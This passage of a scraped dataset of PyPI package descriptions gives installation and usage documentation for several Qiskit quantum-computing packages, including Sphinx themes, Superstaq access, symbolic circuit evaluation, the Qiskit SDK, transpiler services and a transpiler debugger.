Hilbert Space: Scaling Up Accurate Quantum Circuit Simulation to a New Level,\" 2020, arXiv: 2007.09304@misc{tsai2020bitslicing,title={Bit-Slicing the Hilbert Space: Scaling Up Accurate Quantum Circuit Simulation to a New Level},author={Yuan{-}Hung Tsai and Jie{-}Hong R. Jiang and Chiao{-}Shan Jhang},year={2020},note={arXiv: 2007.09304}}ContactIf you have any questions or suggestions, feel free tocreate an issue, or contact us throughmatthewyhtsai@gmail.com."} +{"package": "qiskit-sphinx-theme", "pacakge-description": "qiskit-sphinx-themeThe Sphinx themes for Qiskit and Qiskit Ecosystem documentation.Warning: new theme migrationIn qiskit-sphinx-theme 1.13, we added the newqiskittheme, which migrates from Pytorch to Furo for several improvements. qiskit-sphinx-theme 1.14 added theqiskit-ecosystemtheme. The old Pytorch theme will be removed in qiskit-sphinx-theme 2.0, which we expect to release in July or August 2023.See the sectionMigrate from old Pytorch theme to new themefor migration instructions.OverviewThis repository hosts three things:Qiskit Sphinx themes (located in thesrc/folder)Example Docs (located in theexample_docs/folder)Qiskit Docs Guide (located in thedocs_guide/folder)The Qiskit Sphinx Themes are the themes used by Qiskit Documentation (https://qiskit.org/documentation/) and Qiskit Ecosystem projects.The Example Docs is a minimal Sphinx project that is used for testing the Qiskit Sphinx Theme. Every\npull request will triggera GitHub workflowthat builds the Example Docs to make sure the changes do\nnot introduce unintended changes.The Qiskit Docs Guide hosts instructions, guidelines and recommendations of good documentation\npractices. Its intent is to help Qiskit maintainers improve the documentation of their projects.\nThe guide is hosted online here:https://qisk.it/docs-guide.InstallationThis package is available on PyPI using:pipinstallqiskit-sphinx-themeThen, set up the theme by updatingconf.py:Sethtml_theme = \"qiskit-ecosystem\"(only Qiskit Terra should useqiskit)Add\"qiskit_sphinx_theme\"toextensionsYou also likely want to sethtml_titleinconf.py. This results in the left sidebar having a more useful and concise name, along with the page title in the browser. Most projects will want to use this in theirconf.py:# Sphinx expects you to set these already.project=\"My Project\"release=\"4.12\"# This sets the title to e.g. `My Project 4.12`.html_title=f\"{project}{release}\"Enable translationsFirst, coordinate with the Translations team athttps://github.com/qiskit-community/qiskit-translationsto express your interest and to coordinate setting up the infrastructure.Once the Translations team is ready, then update yourconf.py:Ensure thatqiskit_sphinx_themeis in theextensionssetting.Set the optiontranslations_listto a list of pairs of the locale code and the language name, e.g.[..., (\"de_DE\", \"German\")].Set the optiondocs_url_prefixto your project's URL prefix, likeecosystem/finance.For example:extensions=[...,\"qiskit_sphinx_theme\",]translations_list=[('en','English'),('bn_BN','Bengali'),('fr_FR','French'),('de_DE','German'),]docs_url_prefix=\"ecosystem/finance\"Enable Previous ReleasesThis feature allows you to link to previous versions of the docs in the left sidebar.First, start additionally deploying your docs to/stable//, e.g./ecosystem/finance/stable/0.5/index.html. Seehttps://github.com/Qiskit/qiskit-experiments/blob/227867937a08075092cd11756214bee3fb1d4d3d/tools/deploy_documentation.sh#L38-L39for an example.Then, update yourconf.py:Ensure thatqiskit_sphinx_themeis in theextensionssetting.Add to the optionhtml_contextan entry forversion_listwith a list of the prior versions, e.g.[\"0.4\", \"0.5\"].Each of these versions must be deployed with the abovestable/URL scheme.You can manually set this, or some projects write a Sphinx extension to dynamically compute the value.You should only put prior versions in this list, not the current release.Set the optiondocs_url_prefixto your project's URL prefix, likeecosystem/finance.For example:extensions=[...,\"qiskit_sphinx_theme\",]html_context={\"version_list\":[\"0.4\",\"0.5\"],}docs_url_prefix=\"ecosystem/finance\"Use custom RST directivesTheqiskit_sphinx_themeextension defines the below custom directives for you to use in RST, if you'd like. Seeexample_docs/docs/sphinx_guide/custom_directives.rstfor examples of how to use them.qiskit-cardqiskit-call-to-action-itemandqiskit-call-to-action-gridEnable Qiskit.org AnalyticsQiskit.org uses Segment Analytics to collect information on traffic to sites under the qiskit.org domain. This is not enabled by default but if you would like to enable it you can add aanalytics_enabledvariable to thehtml_contextobject in yourconf.py. Setting this toTruewill enable analytics for your site once it is deployed toqiskit.org/.html_context={'analytics_enabled':True}By enabling analytics we will be able to collect information on number of visits to each documentation page. It will also trigger the addition of aWas this page helpful?component at the bottom of each documentation page, so users will be able to provide yes/no feedback for each page.If you do not enable analytics, no data will be collected and theWas this page helpful?component will not show.Add an announcement banner to all pages:warning:Note:This feature is currently only available for the Qiskit theme, it is not yet available in the Ecosystem themeTheqiskittheme includes the ability to add a custom announcement banner to every page. You can configure this in yourconf.pyby adding your\ncustom announcement text to thetheme_announcementvariable in thehtml_contextobject, for example:html_context = {\n \"theme_announcement\": \"\ud83c\udf89 Custom announcement text!\",\n}The above code will enable the following banner:You can also optionally add a \"Learn more\" url by additionally setting theannouncement_urlin thehtml_context, like so:html_context = {\n \"theme_announcement\": \"\ud83c\udf89 Custom announcement text!\",\n \"announcement_url\": \"https://example.com\"\n}The above code will render the following banner:The default text for the link is \"Learn more\" but you can provide custom link text by setting theannouncement_url_textin thehtml_context:html_context = {\n \"theme_announcement\": \"\ud83c\udf89 Custom announcement text!\",\n \"announcement_url\": \"https://example.com\",\n \"announcement_url_text\": \"Check it out\",\n}Customize or disable the Ecosystem theme logoTheqiskit-ecosystemtheme includes the Qiskit Ecosystem logo by default.You can use a custom logo by adding a logo file (SVG or PNG) as a sibling to yourconf.py, e.g.docs/logo.svg. Then, sethtml_logoinconf.pyto the name of the file, e.g.html_logo = \"logo.png\".When using a custom logo, you may want to disable the project's name in the sidebar by settingsidebar_hide_nameinhtml_theme_options:html_theme_options={\"sidebar_hide_name\":True,}You can disable logos by settingdisable_ecosystem_logoinhtml_theme_options:html_theme_options={\"disable_ecosystem_logo\":True,}IBM Projects: how to use blue color scheme for Ecosystem themeBy default, theqiskit-ecosystemtheme uses purple as an accent color. Most projects should continue to use this, but certain highly IBM-affiliated projects like Qiskit IBM Runtime can change the accent color to blue by setting upconf.pylike this:# Only intended for specific IBM projects.html_theme_options={\"light_css_variables\":{\"color-brand-primary\":\"var(--qiskit-color-blue)\",}}Migrate from old Pytorch theme to new themeIn qiskit-sphinx-theme 1.13, we migrated to a new Sphinx theme calledqiskit, which is based on Furo from the pip, Black, and attrs documentation. Seehttps://github.com/Qiskit/qiskit_sphinx_theme/issues/232for the motivation. qiskit-sphinx-theme 1.14 added theqiskit-ecosystemtheme for Ecosystem projects.qiskit-sphinx-theme 1.13+ continues to support the legacy Pytorch theme, but support will be removed in version 2.0.To migrate, inconf.py:Ensure that\"qiskit_sphinx_theme\"is in theextensionslist.Sethtml_theme = \"qiskit-ecosystem\"rather than\"qiskit_sphinx_theme\". (qiskitshould only be used by Qiskit Terra.)Remove allhtml_theme_options.Removeexpandable_sidebarfromhtml_context, if set. If it was set, follow the below sectionHow to migrate expandable_sidebar.Render the docs and check that everything looks how expected. If not, please open a GitHub issue or reach out on Slack for help.How to migrate expandable_sidebarWith the old theme, to have expandable folders, you had to have a dedicated.. toctree ::directive with a:caption:option, like this:..toctree:::caption:My Folder:hidden:Page 1 \n Page 2 Instead, the new theme will render the:caption:as a top-level section header in the left sidebar, with top-level entries for each page. See the screenshot in the PR description ofhttps://github.com/Qiskit/qiskit_sphinx_theme/pull/384for an example of how the old theme renders:caption:and compare tothe new theme.Additionally, the new theme renders pages with their own subpages as expandable folders, unlike the old theme.For example,will include all subpages that are listed in the.. toctree ::of the pageapidocs/index.rst.So, when migrating, you have to decide which behavior you want:Use the new theme's style. No changes necessary.Use the new theme's style, but get rid of the top level section header. To implement:Consolidate the.. toctree ::directive with earlier ones so that they are all in the sametoctree.Keep the:caption:as an expandable folder, rather than a top-level section header. To implement:Create a new directory and RST file likemy_folder/index.rst.Move the.. toctree::directive to that page.Get rid of the:caption:option.Link to the new filemy_folder/index.rstin the parentindex.rstby adding it to a.. toctree ::in the parent.Tip: suggested site structureTo keep UX/UI similar across different Qiskit packages, we encourage the following structure for you sidebar, which can be set in the toctree of yourindex.rst:..toctree:::hidden:Documentation Home \n Getting Started \n Tutorials \n How-to Guides \n API Reference \n Explanations \n Release Notes \n GitHub Each item in the toctree corresponds to a single.rstfile, and can use internal links or external. External links will have a \"new tab\" icon rendered next to them."} +{"package": "qiskit-superstaq", "pacakge-description": "qiskit-superstaqThis package is used to access Superstaq via a Web API throughQiskit. Qiskit programmers\ncan take advantage of the applications, pulse level optimizations, and write-once-target-all\nfeatures of Superstaq with this package.qiskit-superstaqisavailable on PyPIand can be installed with:pip install qiskit-superstaqPlease note that Python version3.8or higher is required. See installation instructionshere.Creating and submitting a circuit through qiskit-superstaqimportqiskitimportqiskit_superstaqasqsstoken=\"Insert superstaq token that you received from https://superstaq.infleqtion.com\"superstaq=qss.superstaq_provider.SuperstaqProvider(token)backend=superstaq.get_backend(\"ibmq_qasm_simulator\")qc=qiskit.QuantumCircuit(2,2)qc.h(0)qc.cx(0,1)qc.measure(0,0)qc.measure(1,1)print(qc)# Submitting a circuit to \"ibmq_qasm_simulator\". Providing the \"dry-run\" method parameter instructs Superstaq to simulate the circuit, and is available to free trial users.job=backend.run(qc,shots=100,method=\"dry-run\")print(job.result().get_counts())"} +{"package": "qiskit-symb", "pacakge-description": "Qiskit DemoDayspresentation $\\rightarrow$ :link:link,\npassword:Demoday20230615(15th June 2023)Jupyter notebook demo $\\rightarrow$ :link:link(15th June 2023)Qiskit Medium blog $\\rightarrow$ :link:link(28th June 2023)Table of contentsIntroductionInstallationUser-modeDev-modeUsage examplesSympifya Qiskit circuitLambdifya Qiskit circuitContributorsIntroductionTheqiskit-symbpackage is meant to be a Python tool to enable the symbolic evaluation of parametric quantum states and operators defined inQiskitby parameterized quantum circuits.A Parameterized Quantum Circuit (PQC) is a quantum circuit where we have at least one free parameter (e.g. a rotation angle $\\theta$). PQCs are particularly relevant in Quantum Machine Learning (QML) models, where the values of these parameters can be learned during training to reach the desired output.In particular,qiskit-symbcan be used to create a symbolic representation of a parametric quantum statevector, density matrix, or unitary operator directly from the Qiskit quantum circuit. This has been achieved through the re-implementation of some basic classes defined in theqiskit/quantum_info/module by usingsympyas a backend for symbolic expressions manipulation.InstallationUser-modepip install qiskit-symb:warning: The package requiresqiskit>=1. See the officialMigration guidesif you are used to a prevoius Qiskit version.Dev-modegit clone https://github.com/SimoneGasperini/qiskit-symb.git\ncd qiskit-symb\npip install -e .Usage examplesSympifya Qiskit circuitLet's get started on how to useqiskit-symbto get the symbolic representation of a given Qiskit circuit. In particular, in this first basic example, we consider the following quantum circuit:fromqiskitimportQuantumCircuitfromqiskit.circuitimportParameter,ParameterVectory=Parameter('y')p=ParameterVector('p',length=2)pqc=QuantumCircuit(2)pqc.ry(y,0)pqc.cx(0,1)pqc.u(0,*p,1)pqc.draw('mpl')To get thesympyrepresentation of the unitary matrix corresponding to the parameterized circuit, we just have to create the symbolicOperatorinstance and call theto_sympy()method:fromqiskit_symb.quantum_infoimportOperatorop=Operator(pqc)op.to_sympy()\\left[\\begin{matrix}\\cos{\\left(\\frac{y}{2} \\right)} & - \\sin{\\left(\\frac{y}{2} \\right)} & 0 & 0\\\\0 & 0 & \\sin{\\left(\\frac{y}{2} \\right)} & \\cos{\\left(\\frac{y}{2} \\right)}\\\\0 & 0 & e^{i \\left(p[0] + p[1]\\right)} \\cos{\\left(\\frac{y}{2} \\right)} & - e^{i \\left(p[0] + p[1]\\right)} \\sin{\\left(\\frac{y}{2} \\right)}\\\\e^{i \\left(p[0] + p[1]\\right)} \\sin{\\left(\\frac{y}{2} \\right)} & e^{i \\left(p[0] + p[1]\\right)} \\cos{\\left(\\frac{y}{2} \\right)} & 0 & 0\\end{matrix}\\right]If you want then to assign a value to some specific parameter, you can use thesubs()method passing a dictionary that maps each parameter to the desired corresponding value:new_op=op.subs({p:[-1,2]})new_op.to_sympy()\\left[\\begin{matrix}\\cos{\\left(\\frac{y}{2} \\right)} & - \\sin{\\left(\\frac{y}{2} \\right)} & 0 & 0\\\\0 & 0 & \\sin{\\left(\\frac{y}{2} \\right)} & \\cos{\\left(\\frac{y}{2} \\right)}\\\\0 & 0 & e^{i} \\cos{\\left(\\frac{y}{2} \\right)} & - e^{i} \\sin{\\left(\\frac{y}{2} \\right)}\\\\e^{i} \\sin{\\left(\\frac{y}{2} \\right)} & e^{i} \\cos{\\left(\\frac{y}{2} \\right)} & 0 & 0\\end{matrix}\\right]Lambdifya Qiskit circuitGiven a Qiskit circuit,qiskit-symbalso allows to generate a Python lambda function with actual arguments matching the Qiskit unbound parameters.\nLet's consider the following example starting from aZZFeatureMapcircuit, commonly used as a data embedding ansatz in QML applications:fromqiskit.circuit.libraryimportZZFeatureMappqc=ZZFeatureMap(feature_dimension=3,reps=1)pqc.draw('mpl')To get the Python function representing the final parameteric statevector, we just have to create the symbolicStatevectorinstance and call theto_lambda()method:fromqiskit_symb.quantum_infoimportStatevectorpqc=pqc.decompose()statevec=Statevector(pqc).to_lambda()We can now call the lambda-generated functionstatevecpassing thexvalues we want to assign to each parameter. The returned object will be anumpy2D-array (withshape=(8,1)in this case) representing the final output statevectorpsi.x=[1.24,2.27,0.29]psi=statevec(*x)This feature can be useful when, given a Qiskit PQC, we want to run it multiple times with different parameters values. Indeed, we can perform a single symbolic evalutation and then call the lambda generated function as many times as needed, passing different values of the parameters at each iteration.ContributorsSimone Gasperini"} +{"package": "qiskit-tensorflow", "pacakge-description": "Qiskit Tensorflow: A Tensorflow based simulator backend for QiskitInstallationpipinstallqiskit-tensorflow"} +{"package": "qiskit-terra", "pacakge-description": "QiskitQiskitis an open-source SDK for working with quantum computers at the level of extended quantum circuits, operators, and primitives.This library is the core component of Qiskit, which contains the building blocks for creating and working with quantum circuits, quantum operators, and primitive functions (sampler and estimator).\nIt also contains a transpiler that supports optimizing quantum circuits and a quantum information toolbox for creating advanced quantum operators.For more details on how to use Qiskit, refer to the documentation located here:https://qiskit.org/documentation/InstallationWe encourage installing Qiskit viapip:pipinstallqiskitPip will handle all dependencies automatically and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thedocumentation.Create your first quantum program in QiskitNow that Qiskit is installed, it's time to begin working with Qiskit. The essential parts of a quantum program are:Define and build a quantum circuit that represents the quantum stateDefine the classical output by measurements or a set of observable operatorsDepending on the output, use the primitive functionsamplerto sample outcomes or theestimatorto estimate values.Create an example quantum circuit using theQuantumCircuitclass:importnumpyasnpfromqiskitimportQuantumCircuit# 1. A quantum circuit for preparing the quantum state |000> + i |111>qc_example=QuantumCircuit(3)qc_example.h(0)# generate superpostionqc_example.p(np.pi/2,0)# add quantum phaseqc_example.cx(0,1)# 0th-qubit-Controlled-NOT gate on 1st qubitqc_example.cx(0,2)# 0th-qubit-Controlled-NOT gate on 2nd qubitThis simple example makes an entangled state known as aGHZ state$(|000\\rangle + i|111\\rangle)/\\sqrt{2}$. It uses the standard quantum gates: Hadamard gate (h), Phase gate (p), and CNOT gate (cx).Once you've made your first quantum circuit, choose which primitive function you will use. Starting withsampler,\nwe usemeasure_all(inplace=False)to get a copy of the circuit in which all the qubits are measured:# 2. Add the classical output in the form of measurement of all qubitsqc_measured=qc_example.measure_all(inplace=False)# 3. Execute using the Sampler primitivefromqiskit.primitives.samplerimportSamplersampler=Sampler()job=sampler.run(qc_measured,shots=1000)result=job.result()print(f\" > Quasi probability distribution:{result.quasi_dists}\")Running this will give an outcome similar to{0: 0.497, 7: 0.503}which is00050% of the time and11150% of the time up to statistical fluctuations.To illustrate the power of Estimator, we now use the quantum information toolbox to create the operator $XXY+XYX+YXX-YYY$ and pass it to therun()function, along with our quantum circuit. Note the Estimator requires a circuitwithoutmeasurement, so we use theqc_examplecircuit we created earlier.# 2. define the observable to be measuredfromqiskit.quantum_infoimportSparsePauliOpoperator=SparsePauliOp.from_list([(\"XXY\",1),(\"XYX\",1),(\"YXX\",1),(\"YYY\",-1)])# 3. Execute using the Estimator primitivefromqiskit.primitivesimportEstimatorestimator=Estimator()job=estimator.run(qc_example,operator,shots=1000)result=job.result()print(f\" > Expectation values:{result.values}\")Running this will give the outcome4. For fun, try to assign a value of +/- 1 to each single-qubit operator X and Y\nand see if you can achieve this outcome. (Spoiler alert: this is not possible!)Using the Qiskit-providedqiskit.primitives.Samplerandqiskit.primitives.Estimatorwill not take you very far. The power of quantum computing cannot be simulated\non classical computers and you need to use real quantum hardware to scale to larger quantum circuits. However, running a quantum\ncircuit on hardware requires rewriting them to the basis gates and connectivity of the quantum hardware.\nThe tool that does this is thetranspilerand Qiskit includes transpiler passes for synthesis, optimization, mapping, and scheduling. However, it also includes a\ndefault compiler which works very well in most examples. The following code will map the example circuit to thebasis_gates = ['cz', 'sx', 'rz']and a linear chain of qubits $0 \\rightarrow 1 \\rightarrow 2$ with thecoupling_map =[[0, 1], [1, 2]].fromqiskitimporttranspileqc_transpiled=transpile(qc_example,basis_gates=['cz','sx','rz'],coupling_map=[[0,1],[1,2]],optimization_level=3)For further examples of using Qiskit you can look at the tutorials in the documentation here:https://qiskit.org/documentation/tutorials.htmlExecuting your code on real quantum hardwareQiskit provides an abstraction layer that lets users run quantum circuits on hardware from any vendor that provides a compatible interface.\nThe best way to use Qiskit is with a runtime environment that provides optimized implementations ofsamplerandestimatorfor a given hardware platform. This runtime may involve using pre- and post-processing, such as optimized transpiler passes with error suppression, error mitigation, and, eventually, error correction built in. A runtime implementsqiskit.primitives.BaseSamplerandqiskit.primitives.BaseEstimatorinterfaces. For example,\nsome packages that provide implementations of a runtime primitive implementation are:https://github.com/Qiskit/qiskit-ibm-runtimeQiskit also provides a lower-level abstract interface for describing quantum backends. This interface, located inqiskit.providers, defines an abstractBackendV2class that providers can implement to represent their\nhardware or simulators to Qiskit. The backend class includes a common interface for executing circuits on the backends; however, in this interface each provider may perform different types of pre- and post-processing and return outcomes that are vendor-defined. Some examples of published provider packages that interface with real hardware are:https://github.com/Qiskit/qiskit-ibm-providerhttps://github.com/qiskit-community/qiskit-ionqhttps://github.com/qiskit-community/qiskit-aqt-providerhttps://github.com/qiskit-community/qiskit-braket-providerhttps://github.com/qiskit-community/qiskit-quantinuum-providerhttps://github.com/rigetti/qiskit-rigettiYou can refer to the documentation of these packages for further instructions\non how to get access and use these systems.Contribution GuidelinesIf you'd like to contribute to Qiskit, please take a look at ourcontribution guidelines. By participating, you are expected to uphold ourcode of conduct.We useGitHub issuesfor tracking requests and bugs. Pleasejoin the Qiskit Slack communityfor discussion, comments, and questions.\nFor questions related to running or using Qiskit,Stack Overflow has aqiskit.\nFor questions on quantum computing with Qiskit, use theqiskittag in theQuantum Computing Stack Exchange(please, read first theguidelines on how to askin that forum).Authors and CitationQiskit is the work ofmany peoplewho contribute\nto the project at different levels. If you use Qiskit, please cite as per the includedBibTeX file.Changelog and Release NotesThe changelog for a particular release is dynamically generated and gets\nwritten to the release page on Github for each release. For example, you can\nfind the page for the0.9.0release here:https://github.com/Qiskit/qiskit-terra/releases/tag/0.9.0The changelog for the current release can be found in the releases tab:The changelog provides a quick overview of notable changes for a given\nrelease.Additionally, as part of each release detailed release notes are written to\ndocument in detail what has changed as part of a release. This includes any\ndocumentation on potential breaking changes on upgrade and new features.\nFor example, you can find the release notes for the0.9.0release in the\nQiskit documentation here:https://qiskit.org/documentation/release_notes.html#terra-0-9AcknowledgementsWe acknowledge partial support for Qiskit development from the DOE Office of Science National Quantum Information Science Research Centers, Co-design Center for Quantum Advantage (C2QA) under contract number DE-SC0012704.LicenseApache License 2.0"} +{"package": "qiskit-toqm", "pacakge-description": "Qiskit TOQMCIstatuspip buildswheelsQiskit Terratranspiler passes for theTime-Optimal Qubit Mapping(TOQM) algorithm.InstallationThis package is available on PyPI asqiskit-toqm.To install it, run:pipinstallqiskit-toqmAlternatively,Clone this repository recursively.Install it from source:pip install .Licensesqiskit-toqm is provided under the Apache 2.0 license that can be found in\nthe LICENSE file.pybind11 is provided under a BSD-style license that can be found in the LICENSE_pybind11\nfile.By using, distributing, or contributing to this project, you agree to the\nterms and conditions of both licenses."} +{"package": "qiskit-transpiler-service", "pacakge-description": "qiskit_transpiler_serviceA library to useQiskit Transpiler serviceand theAI transpiler passes.NoteThe Qiskit transpiler service and the AI transpiler passes use different experimental services that are only available for IBM Quantum Premium Plan users. This library and the releated services are an alpha release, subject to change.Installing the qiskit-transpiler-serviceTo use the Qiskit transpiler service, install theqiskit-transpiler-servicepackage:pipinstallqiskit-transpiler-serviceBy default, the package tries to authenticate to IBM Quantum services with the defined Qiskit API token, and uses your token from theQISKIT_IBM_TOKENenvironment variable or from the file~/.qiskit/qiskit-ibm.json(under the sectiondefault-ibm-quantum).How to use the libraryUsing the Qiskit Transpiler serviceThe following examples demonstrate how to transpile circuits using the Qiskit transpiler service with different parameters.Create a circuit and call the Qiskit transpiler service to transpile the circuit withibm_sherbrookeas thebackend_name, 3 as theoptimization_level, and not using AI during the transpilation.fromqiskit.circuit.libraryimportEfficientSU2fromqiskit_transpiler_service.transpiler_serviceimportTranspilerServicecircuit=EfficientSU2(101,entanglement=\"circular\",reps=1).decompose()cloud_transpiler_service=TranspilerService(backend_name=\"ibm_sherbrooke\",ai=False,optimization_level=3,)transpiled_circuit=cloud_transpiler_service.run(circuit)Note:you only can usebackend_namedevices you are allowed to with your IBM Quantum Account. Apart from thebackend_name, theTranspilerServicealso allowscoupling_mapas parameter.Produce a similar circuit and transpile it, requesting AI transpiling capabilities by setting the flagaitoTrue:fromqiskit.circuit.libraryimportEfficientSU2fromqiskit_transpiler_service.transpiler_serviceimportTranspilerServicecircuit=EfficientSU2(101,entanglement=\"circular\",reps=1).decompose()cloud_transpiler_service=TranspilerService(backend_name=\"ibm_sherbrooke\",ai=True,optimization_level=1,)transpiled_circuit=cloud_transpiler_service.run(circuit)Using the AIRouting pass manuallyTheAIRoutingpass acts both as a layout stage and a routing stage. It can be used within aPassManageras follows:fromqiskit.transpilerimportPassManagerfromqiskit_transpiler_service.ai.routingimportAIRoutingfromqiskit.circuit.libraryimportEfficientSU2ai_passmanager=PassManager([AIRouting(backend_name=\"ibm_sherbrooke\",optimization_level=2,layout_mode=\"optimize\")])circuit=EfficientSU2(101,entanglement=\"circular\",reps=1).decompose()transpiled_circuit=ai_passmanager.run(circuit)Here, thebackend_namedetermines which backend to route for, theoptimization_level(1, 2, or 3) determines the computational effort to spend in the process (higher usually gives better results but takes longer), and thelayout_modespecifies how to handle the layout selection.\nThelayout_modeincludes the following options:keep: This respects the layout set by the previous transpiler passes (or uses the trivial layout if not set). It is typically only used when the circuit must be run on specific qubits of the device. It often produces worse results because it has less room for optimization.improve: This uses the layout set by the previous transpiler passes as a starting point. It is useful when you have a good initial guess for the layout; for example, for circuits that are built in a way that approximately follows the device's coupling map. It is also useful if you want to try other specific layout passes combined with theAIRoutingpass.optimize: This is the default mode. It works best for general circuits where you might not have good layout guesses. This mode ignores previous layout selections.Using the AI circuit synthesis passesThe AI circuit synthesis passes allow you to optimize pieces of different circuit types (Clifford,Linear Function,Permutation) by re-synthesizing them. The typical way one would use the synthesis pass is the following:fromqiskit.transpilerimportPassManagerfromqiskit_transpiler_service.ai.routingimportAIRoutingfromqiskit_transpiler_service.ai.synthesisimportAILinearFunctionSynthesisfromqiskit_transpiler_service.ai.collectionimportCollectLinearFunctionsfromqiskit.circuit.libraryimportEfficientSU2ai_passmanager=PassManager([AIRouting(backend_name=\"ibm_cairo\",optimization_level=3,layout_mode=\"optimize\"),# Route circuitCollectLinearFunctions(),# Collect Linear Function blocksAILinearFunctionSynthesis(backend_name=\"ibm_cairo\")# Re-synthesize Linear Function blocks])circuit=EfficientSU2(10,entanglement=\"full\",reps=1).decompose()transpiled_circuit=ai_passmanager.run(circuit)The synthesis respects the coupling map of the device: it can be run safely after other routing passes without \"messing up\" the circuit, so the overall circuit will still follow the device restrictions. By default, the synthesis will replace the original sub-circuit only if the synthesized sub-circuit improves the original (currently only checking cnot count), but this can be forced to always replace the circuit by settingreplace_only_if_better=False.The following synthesis passes are available fromqiskit_transpiler_service.ai.synthesis:AICliffordSynthesis: Synthesis forCliffordcircuits (blocks ofH,SandCXgates). Currently up to 9 qubit blocks.AILinearFunctionSynthesis: Synthesis forLinear Functioncircuits (blocks ofCXandSWAPgates). Currently up to 9 qubit blocks.AIPermutationSynthesis: Synthesis forPermutationcircuits (blocks ofSWAPgates). Currently available for 65, 33, and 27 qubit blocks.We expect to gradually increase the size of the supported blocks.All passes use a thread pool to send several requests in parallel. By default it will use as max threads as number of cores plus four (default values forThreadPoolExecutorpython object). However, you can set your own value with themax_threadsargument at pass instantation. For example, the following line will instantiate theAILinearFunctionSynthesispass allowing it to use a maximum of 20 threads.AILinearFunctionSynthesis(backend_name=\"ibm_cairo\",max_threads=20)# Re-synthesize Linear Function blocks using 20 threads maxYou can also set the environment variableAI_TRANSPILER_MAX_THREADSto the desired number of maximum threads, and all syntheis passes instantiated after that will use that value.For sub-circuit to be synthesized by the AI synthesis passes, it must lay on a connected subgraph of the coupling map (this can be ensured by just doing a routing pass previous to collecting the blocks, but this is not the only way to do it). The synthesis passes will automatically check if a the specific subgraph where the sub-circuit lays is supported, and if it is not supported it will raise a warning and just leave the original sub-circuit as it is.To complement the synthesis passes we also provide custom collection passes for Cliffords, Linear Functions and Permutations that can be imported fromqiskit_transpiler_service.ai.collection:CollectCliffords: Collects Clifford blocks asInstructionobjects and stores the original sub-circuit to compare against it after synthesis.CollectLinearFunctions: Collects blocks ofSWAPandCXasLinearFunctionobjects and stores the original sub-circuit to compare against it after synthesis.CollectPermutations: Collects blocks ofSWAPcircuits asPermutations.These custom collection passes limit the sizes of the collected sub-circuits so that they are supported by the AI synthesis passes, so it is recommended to use them after the routing passes and before the synthesis passes to get a better optimization overall."} +{"package": "qiskit-trebugger", "pacakge-description": "Qiskit TrebuggerA new take on debuggers for quantum transpilers.\nThis repository presents a debugger for theqiskit transpilerin the form of a light weight jupyter widget. Built as a project for the Qiskit Advocate Mentorship Program, Fall 2021.InstallationTo install the debugger using pip (a python package manager), use -pipinstallqiskit-trebuggerPIP will handle the dependencies required for the package automatically and would install the latest version.To directly install via github follow the steps below after usinggit clone:gitclonehttps://github.com/TheGupta2012/qiskit-timeline-debugger.gitMake surepython3andpipare installed in your system. It is recommended to use a python virtual environment to install and develop the debuggercdinto theqiskit-timeline-debuggerdirectoryUsepip install -r requirements.txtto install the project dependenciesNext, executepip install .command to install the debuggerUsage InstructionsAfter installing the package, import theDebuggerinstance fromqiskit_trebuggerpackage.To run the debugger, simply replace the call totranspile()method of the qiskit module withdebug()method of your debugger instance.The debugger provides two types of views namelyjupyterandcliThecliview is the default view and recommender for users who want to use the debugger in a terminal environmentThejupyterview is recommended for usage in a jupyter notebook and provides a more interactive and detailed view of the transpilation process.For an example -fromqiskit.providers.fake_providerimportFakeCasablancafromqiskit.circuit.randomimportrandom_circuitfromqiskit_trebuggerimportDebuggerimportwarningswarnings.simplefilter('ignore')debugger=Debugger(view_type=\"jupyter\")backend=FakeCasablanca()circuit=random_circuit(num_qubits=4,depth=5,seed=44)# replace transpile calldebugger.debug(circuit,optimization_level=2,backend=backend,initial_layout=list(range(4)))On calling the debug method, a new jupyter widget is displayed providing a complete summary and details of the transpilation process for circuits of < 2000 depthWith an easy to use and responsive interface, users can quickly see which transpiler passes ran when, how they changed the quantum circuit and what exactly changed.Feature Highlightsjupyterview1. Circuit EvolutionSee your circuit changing while going through the transpilation process for a target quantum processor.A new custom feature enablingvisual diffsfor quantum circuits, allows you to see what exactly changed in your circuit using the matplotlib drawer of the qiskit module.ExampleCircuit 1Circuit 22. Circuit statisticsAllows users to quickly scan through how the major properties of a circuit transform during each transpilation pass.Helps to quickly isolate the passes which were responsible for the major changes in the resultant circuit.3. Transpiler Logs and Property setsEasily parse actions of the transpiler with logs emitted by each of its constituent passes and changes to the property set during transpilationEvery log record is color coded according to the level of severity i.e.DEBUG,INFO,WARNINGandCRITICAL.cliview1. Transpilation Summary and StatisticsA quick summary of the transpilation process for a given circuit.Faster access to information in the CLI view.2. Keyboard ShortcutsThe CLI view provides keyboard shortcuts for easy navigation and access to transpiler information.Aninteractive status barat the bottom of the screen provides information about the current state of the debugger.3. Transpiler Logs and Property setsEmits transpiler logs associated with each of the transpiler passes.Highlights addition to property set and its changes during the transpilation process.Demonstration and BlogHere is ademonstration of TreBuggeras a part of the final showcase for the Qiskit Advocate Mentorship Program, Fall 2021.You can also read about some more details of our project in theQiskit medium blogContributorsAboulkhair FodaHarshit Gupta"} +{"package": "qiskit-utils", "pacakge-description": "qiskit-utilsqiskit-utils is a library containing utility, quality of life methods for qiskit.current methodsparsing resultsparsing countsinserting instructions and gates into circuit (in any location not just append the gate to the circuit)Inserting instructionsfromqiskit_utilsimportinsert_instructioninstruction=Measure()insert_instruction(circuit,instruction,(circuit.qubits[0],),(circuit.clbits[1],),index)QuantumCircuitEnhancedfromqiskit.circuit.libraryimportiSwapGatefromqiskit_utilsimportQuantumCircuitEnhancedqc=QuantumCircuitEnhanced(2)qc.insert(iSwapGate(),(0,1),(,),index)Result parsingparse_result method allows to find the counts for each specific qubit individually\n(and allows for easy access to check counts for that one specific qubit, independent of the other qubit states)qc=QuantumCircuit(1,1)qc.x(0)qc.measure(0,0)backend=Aer.get_backend(\"aer_simulator\")transpiled_circuit=transpile(qc,backend)result=backend.run(transpiled_circuit).result()parsed_counts=parse_result(result,qc)# parsed_counts = {0: {'0': 0, '1': 1024}}2 return types are possible, with using the flag indexed_results=True resulting directory keys (the most upper level)\nwill be indexes of qubits (indexes will be same as in qc.qubits), with the flag set to false qubits will be returned\nindexed by the qubit object itself (can be received either from qc.qubits[i] or QuantumRegister()[i])Result parsing with 